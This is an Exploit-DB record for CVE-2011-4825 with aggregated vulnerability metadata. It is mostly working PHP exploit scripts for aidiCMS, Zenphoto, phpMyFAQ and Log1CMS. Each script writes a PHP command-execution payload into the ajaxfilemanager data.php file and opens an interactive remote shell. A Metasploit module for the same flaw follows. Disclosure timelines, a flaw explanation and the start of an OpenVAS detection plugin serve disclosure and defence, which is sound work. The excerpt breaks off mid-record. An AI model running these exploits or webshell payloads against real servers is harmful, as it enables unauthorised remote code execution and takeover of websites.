ID EDB-ID:18085
Type exploitdb
Reporter EgiX
Modified 2011-11-05T00:00:00
Description
aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform
<?php
/*
--------------------------------------------------------------------
aidiCMS v3.55 (ajax_create_folder.php) Remote Code Execution Exploit
--------------------------------------------------------------------
author............: Egidio Romano aka EgiX
mail..............: n0b0d13s[at]gmail[dot]com
software link.....: http://code.google.com/p/aidicms/
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability overview:
aidiCMS v3.55 is affected by the vulnerability that I reported to http://www.exploit-db.com/exploits/18075/
[-] Disclosure timeline:
[23/10/2011] - Vulnerability discovered
[24/10/2011] - Issue reported to http://code.google.com/p/aidicms/issues/detail?id=3
[26/10/2011] - Project members contacted via e-mail
[04/11/2011] - Still no response received
[05/11/2011] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------+";
print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /aidicms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\naidicms-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
{"id": "EDB-ID:18085", "hash": "b75823b9f5e5375de188f20a264361c3", "type": "exploitdb", "bulletinFamily": "exploit", "title": "aidiCMS 3.55 - ajax_create_folder.php Remote Code Execution", "description": "aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-05T00:00:00", "modified": "2011-11-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18085/", "reporter": "EgiX", "references": [], "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:09:08", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-02T09:09:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4825"]}, {"type": "exploitdb", "idList": ["EDB-ID:18084", "EDB-ID:18083", "EDB-ID:18975", "EDB-ID:18075", "EDB-ID:18151"]}, {"type": "dsquare", "idList": ["E-129", "E-150"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103334", "OPENVAS:1361412562310103496"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113226"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/LOG1CMS_AJAX_CREATE_FOLDER"]}], "modified": "2016-02-02T09:09:08"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/18085/", "sourceData": "<?php\r\n\r\n/*\r\n --------------------------------------------------------------------\r\n aidiCMS v3.55 (ajax_create_folder.php) Remote Code Execution Exploit\r\n --------------------------------------------------------------------\r\n \r\n author............: Egidio Romano aka EgiX\r\n mail..............: n0b0d13s[at]gmail[dot]com\r\n software link.....: http://code.google.com/p/aidicms/\r\n \r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] Vulnerability overview:\r\n \r\n aidiCMS v3.55 is affected by the vulnerability that I reported to http://www.exploit-db.com/exploits/18075/\r\n \r\n [-] Disclosure timeline:\r\n \r\n [23/10/2011] - Vulnerability discovered\r\n [24/10/2011] - Issue reported to http://code.google.com/p/aidicms/issues/detail?id=3\r\n [26/10/2011] - Project members contacted via e-mail\r\n [04/11/2011] - Still no response received\r\n [05/11/2011] - Public disclosure\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die( \"\\n[-] No response from {$host}:80\\n\");\r\n\r\n fwrite($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+-----------------------------------------------------+\";\r\nprint \"\\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |\";\r\nprint \"\\n+-----------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /aidicms/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\\$_SERVER[HTTP_CMD]));die; ?>\";\r\n$packet = \"POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n\r\nhttp_send($host, $packet);\r\n\r\n$packet = \"GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1)\r\n{\r\n print \"\\naidicms-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n preg_match(\"/_code_(.*)/s\", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?\r\n print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>", "osvdbidlist": ["76928"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:11:25", "bulletinFamily": "NVD", "description": "Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters.", "modified": "2011-12-15T18:03:00", "id": "CVE-2011-4825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4825", "published": "2011-12-15T03:57:00", "title": "CVE-2011-4825", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T09:08:51", "bulletinFamily": "exploit", "description": "Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "modified": "2011-11-05T00:00:00", "published": "2011-11-05T00:00:00", "id": "EDB-ID:18083", "href": "https://www.exploit-db.com/exploits/18083/", "type": "exploitdb", "title": "Zenphoto <= 1.4.1.4 - ajax_create_folder.php Remote Code Execution", "sourceData": "<?php\r\n\r\n/*\r\n --------------------------------------------------------------------------\r\n Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution Exploit\r\n --------------------------------------------------------------------------\r\n \r\n author............: Egidio Romano aka EgiX\r\n mail..............: n0b0d13s[at]gmail[dot]com\r\n software link.....: http://www.zenphoto.org/\r\n \r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] Vulnerability overview:\r\n \r\n All versions of Zenphoto from 1.2.4 to 1.4.1.4 are affected by the\r\n vulnerability that I reported to http://www.exploit-db.com/exploits/18075/\r\n \r\n [-] Disclosure timeline:\r\n \r\n [21/10/2011] - Vulnerability discovered\r\n [24/10/2011] - Issue reported to http://www.zenphoto.org/trac/ticket/2005\r\n [31/10/2011] - Fix released with version 1.4.1.5\r\n [05/11/2011] - Public disclosure\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die( \"\\n[-] No response from {$host}:80\\n\");\r\n\r\n fwrite($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+-----------------------------------------------------------+\";\r\nprint \"\\n| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |\";\r\nprint \"\\n+-----------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /zenphoto/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\\$_SERVER[HTTP_CMD]));die; ?>\";\r\n$packet = \"POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n\r\nhttp_send($host, $packet);\r\n\r\n$packet = \"GET {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1)\r\n{\r\n print \"\\nzenphoto-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n preg_match(\"/_code_(.*)/s\", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?\r\n print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18083/"}, {"lastseen": "2016-02-02T09:08:59", "bulletinFamily": "exploit", "description": "phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "modified": "2011-11-05T00:00:00", "published": "2011-11-05T00:00:00", "id": "EDB-ID:18084", "href": "https://www.exploit-db.com/exploits/18084/", "type": "exploitdb", "title": "phpMyFAQ <= 2.7.0 ajax_create_folder.php Remote Code Execution", "sourceData": "<?php\r\n\r\n/*\r\n ------------------------------------------------------------------------\r\n phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution Exploit\r\n ------------------------------------------------------------------------\r\n \r\n author............: Egidio Romano aka EgiX\r\n mail..............: n0b0d13s[at]gmail[dot]com\r\n software link.....: http://www.phpmyfaq.de/\r\n \r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] Vulnerability overview:\r\n \r\n All versions of phpMyFAQ <= 2.6.18 and phpMyFAQ <= 2.7.0 are affected by the\r\n vulnerability that I reported to http://www.exploit-db.com/exploits/18075/\r\n Successful exploitation of this vulnerability requires authentication.\r\n \r\n [-] Disclosure timeline:\r\n \r\n [23/10/2011] - Vulnerability discovered\r\n [24/10/2011] - Issue reported to http://forum.phpmyfaq.de/viewtopic.php?t=13402\r\n [25/10/2011] - Fix released, more details at http://www.phpmyfaq.de/advisory_2011-10-25.php\r\n [05/11/2011] - Public disclosure\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die( \"\\n[-] No response from {$host}:80\\n\");\r\n\r\n fwrite($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+---------------------------------------------------------+\";\r\nprint \"\\n| phpMyFAQ <= 2.7.0 Remote Code Execution Exploit by EgiX |\";\r\nprint \"\\n+---------------------------------------------------------+\\n\";\r\n\r\nif ($argc < 5)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path> <username> <password>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /phpmyfaq/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"faqusername={$argv[3]}&faqpassword={$argv[4]}\";\r\n$packet = \"POST {$path}?action=login HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cookie: pmf_auth=foo\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n\r\nif (!preg_match(\"/pmf_auth=([^;]*);/\", http_send($host, $packet), $auth)) die(\"\\n[-] Login failed!\\n\");\r\n\r\n$packet = \"GET {$path}admin/editor/plugins/ajaxfilemanager/ajax_login.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cookie: pmf_auth={$auth[1]}\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nhttp_send($host, $packet);\r\n\r\n$payload = \"foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\\$_SERVER[HTTP_CMD]));die; ?>\";\r\n$packet = \"POST {$path}admin/editor/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cookie: pmf_auth={$auth[1]}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n\r\nhttp_send($host, $packet);\r\n\r\n$packet = \"GET {$path}admin/editor/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1)\r\n{\r\n print \"\\nphpmyfaq-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n preg_match(\"/_code_(.*)/s\", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?\r\n print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18084/"}, {"lastseen": "2016-02-02T09:07:44", "bulletinFamily": "exploit", "description": "Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability. CVE-2011-4825. Webapps exploit for php platform", "modified": "2011-11-04T00:00:00", "published": "2011-11-04T00:00:00", "id": "EDB-ID:18075", "href": "https://www.exploit-db.com/exploits/18075/", "type": "exploitdb", "title": "Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability", "sourceData": " --------------------------------------------------------------------------\r\n Ajax File and Image Manager v1.0 Final Remote Code Execution Vulnerability\r\n --------------------------------------------------------------------------\r\n \r\n author...........: Egidio Romano aka EgiX\r\n mail.............: n0b0d13s[at]gmail[dot]com\r\n software link....: http://www.phpletter.com/\r\n \r\n \r\n [-] Vulnerability explanation:\r\n \r\n The vulnerable code is located into /ajaxfilemanager/ajax_create_folder.php:\r\n \r\n 11.\t@ob_start();\r\n 12.\tdisplayArray($_POST);\r\n 13.\twriteInfo(@ob_get_clean());\r\n \r\n this script start the output buffering at line 11 and then call the 'displayArray'\r\n function that simply displays the $_POST array content with the print_r() function,\r\n and finally at line 13 is called the 'writeInfo' function using the current buffer\r\n contents as parameter (that is the $_POST array content). Now look at the 'writeInfo'\r\n function body defined into /ajaxfilemanager/inc/function.base.php:\r\n \r\n 228.\tfunction writeInfo($data, $die = false)\r\n 229.\t{\r\n 230.\t $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+');\r\n 231.\t @fwrite($fp, $data);\r\n 232.\t @fwrite($fp, \"\\n\\n\" . date('d/M/Y H:i:s') );\r\n 233.\t @fclose($fp);\r\n \r\n It writes the $data paramater into a file called 'data.php' without any check,\r\n so an attacker could be able to inject and execute arbitrary PHP code.\r\n \r\n \r\n [-] Disclosure timeline:\r\n \r\n [21/10/2011] - Vulnerability discovered\r\n [24/10/2011] - Issue reported via e-mail\r\n [25/10/2011] - Vendor replied that a fix will be released in the next version\r\n [04/11/2011] - Public disclosure\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18075/"}, {"lastseen": "2016-02-02T09:15:52", "bulletinFamily": "exploit", "description": "Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "modified": "2011-11-24T00:00:00", "published": "2011-11-24T00:00:00", "id": "EDB-ID:18151", "href": "https://www.exploit-db.com/exploits/18151/", "type": "exploitdb", "title": "Log1CMS 2.0 - ajax_create_folder.php Remote Code Execution", "sourceData": "<?php\r\n/*\r\n+-----------------------------------------------------------+\r\n+ Log1CMS 2.0(ajax_create_folder.php) Remote Code Execution + \r\n+-----------------------------------------------------------+\r\n \r\nWeb-App : Log1CMS 2.0\r\nVendor : http://log1cms.sourceforge.net/\r\nVulnerability : Remote Code Execution\r\nAuthor : Adel SBM\r\nWebsite : www.The-code.tk\r\nFacebook : http://www.facebook.com/profile.php?id=100002938082057\r\nGoogle-Dork : \"POWERED BY LOG1 CMS\"\r\nTested on : Windows XP SP2\r\n \r\n+-----------------------------------------------------------+\r\n+ VIVE Algeria + \r\n+-----------------------------------------------------------+\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n \r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die( \"\\n[-] No Response From {$host}:80\\n\");\r\n \r\n fwrite($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n \r\nprint \"\\n+------------------------------------------------------------------------+\";\r\nprint \"\\n| Log1CMS 2.0 Remote Code Execution Exploit by Adel SBM |\";\r\nprint \"\\n| SPl ThanX To: EgiX(exploit founder end coder)-The DoN |\";\r\nprint \"\\n| Greetz to: Over-X & ind0ushka .. |\";\r\nprint \"\\n| TeaM Official website: www.The-code.tk |\";\r\nprint \"\\n| VIVE Algeria |\";\r\nprint \"\\n+------------------------------------------------------------------------+\\n\";\r\n \r\nif ($argc < 3)\r\n{\r\nprint \"\\n+------------------------------------------------------------------------+\";\r\nprint \"\\n| Usage......: php $argv[0] <host> <path> |\";\r\nprint \"\\n| Example....: php $argv[0] localhost / |\";\r\nprint \"\\n| Example....: php $argv[0] localhost /log1cms/ |\";\r\nprint \"\\n+------------------------------------------------------------------------+\\n\";\r\ndie();\r\n}\r\n \r\n$host = $argv[1];\r\n$path = $argv[2];\r\n \r\n$payload = \"foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\\$_SERVER[HTTP_CMD]));die; ?>\";\r\n$packet = \"POST {$path}admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n \r\nhttp_send($host, $packet);\r\n \r\n$packet = \"GET {$path}admin/libraries/ajaxfilemanager/inc/data.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\nwhile(1)\r\n{\r\n print \"\\n@AdelSBM# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n preg_match(\"/_code_(.*)/s\", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?\r\n print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n \r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18151/"}, {"lastseen": "2016-02-02T10:49:07", "bulletinFamily": "exploit", "description": "Log1 CMS writeInfo() PHP Code Injection. CVE-2011-4825. Webapps exploit for php platform", "modified": "2012-06-03T00:00:00", "published": "2012-06-03T00:00:00", "id": "EDB-ID:18975", "href": "https://www.exploit-db.com/exploits/18975/", "type": "exploitdb", "title": "Log1 CMS writeInfo PHP Code Injection", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Log1 CMS writeInfo() PHP Code Injection\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits the \"Ajax File and Image Manager\" component that can be\r\n\t\t\t\tfound in log1 CMS. In function.base.php of this component, the 'data' parameter\r\n\t\t\t\tin writeInfo() allows any malicious user to have direct control of writing data\r\n\t\t\t\tto file data.php, which results in arbitrary remote code execution.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'EgiX', #Found the bug in ajax_create_folder.php\r\n\t\t\t\t\t'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-4825'],\r\n\t\t\t\t\t['OSVDB', '76928'],\r\n\t\t\t\t\t['EDB', '18075'], #Egix's advisory\r\n\t\t\t\t\t['EDB', '18151'] #Adel's\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"none\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'php',\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['log1 CMS 2.0', {}],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Apr 11 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('TARGETURI', [true, 'The base path to log1 CMS', '/log1cms2.0/'])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\t\turi << '/' if uri[-1, 1] != '/'\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php\"\r\n\t\t})\r\n\r\n\t\tif res and res.code == 200\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\turi = target_uri.path\r\n\t\turi << '/' if uri[-1, 1] != '/'\r\n\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\t\tphp = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>|\r\n\r\n\t\tprint_status(\"#{peer} - Sending PHP payload (#{php.length.to_s} bytes)\")\r\n\t\tsend_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php\",\r\n\t\t\t'data' => php\r\n\t\t})\r\n\r\n\t\tprint_status(\"#{peer} - Requesting data.php\")\r\n\t\tsend_request_raw({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"#{uri}admin/libraries/ajaxfilemanager/inc/data.php\"\r\n\t\t})\r\n\r\n\t\thandler\r\n\tend\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18975/"}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in Log1 CMS ajax_create_folder.php\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-06-26T00:00:00", "id": "E-150", "href": "", "type": "dsquare", "title": "Log1 CMS 2.0 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "description": "Remote command execution vulnerability in phpMyFAQ ajax_create_folder.php\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-04-27T00:00:00", "id": "E-129", "href": "", "type": "dsquare", "title": "phpMyFAQ 2.7.0 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:39:56", "bulletinFamily": "scanner", "description": "Ajax File and Image Manager is prone to a remote PHP code-injection\n vulnerability.", "modified": "2018-10-22T00:00:00", "published": "2011-11-07T00:00:00", "id": "OPENVAS:1361412562310103334", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103334", "title": "Ajax File and Image Manager 'data.php' PHP Code Injection Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_afim_50523.nasl 12014 2018-10-22 10:01:47Z mmartin $\n#\n# Ajax File and Image Manager 'data.php' PHP Code Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103334\");\n script_cve_id(\"CVE-2011-4825\");\n script_bugtraq_id(50523);\n script_version(\"$Revision: 12014 $\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ajax File and Image Manager 'data.php' PHP Code Injection Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/50523\");\n script_xref(name:\"URL\", 